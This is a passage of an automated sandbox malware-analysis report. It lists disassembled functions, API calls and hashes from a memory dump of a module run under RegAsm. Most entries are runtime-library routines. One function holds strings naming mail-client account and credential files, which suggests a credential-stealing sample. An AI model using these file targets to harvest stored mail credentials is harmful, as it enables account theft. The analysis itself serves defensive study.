                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                                                                                      Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strlen
                                                                                                                                                                                                                      • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                                                      • API String ID: 4218353326-230879103
                                                                                                                                                                                                                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                                      • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                                                                                      Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                                                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007D32
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007D72
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007D80
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                                                      • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                                                      • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                                                                      Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100059EA
                                                                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100059F6
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A01
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A17
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A22
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A38
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A43
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005A51
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                      • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                                                      • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                                                                                      Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                                                                      • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                                                      • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                                                                                      Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                      • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                                                      • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                                                                                      Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100092AB
                                                                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100092B6
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100092C1
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10009315
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10009320
                                                                                                                                                                                                                      • _free.LIBCMT ref: 1000932B
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10009336
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                                      • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                                                                                      Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                                                                      • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1922816806-0
                                                                                                                                                                                                                      • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                                                      • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                                                                                      Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3594823470-0
                                                                                                                                                                                                                      • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                                                      • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                                                                                                      Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                      • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                                                      • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                                                                                                      Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005B55
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                                                                      • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                                                                      • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                                                      • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                                                                                      Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                                                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                                                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                                                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                                                                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                                                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                      • API String ID: 4036392271-1520055953
                                                                                                                                                                                                                      • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                                                      • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                                                                      Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                                                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                                                                      • _free.LIBCMT ref: 100071B8
                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                                                                                      • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                                                      • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                                                                      Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                                                                      • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000011.00000002.874094422.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874082349.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000011.00000002.874094422.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                      • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
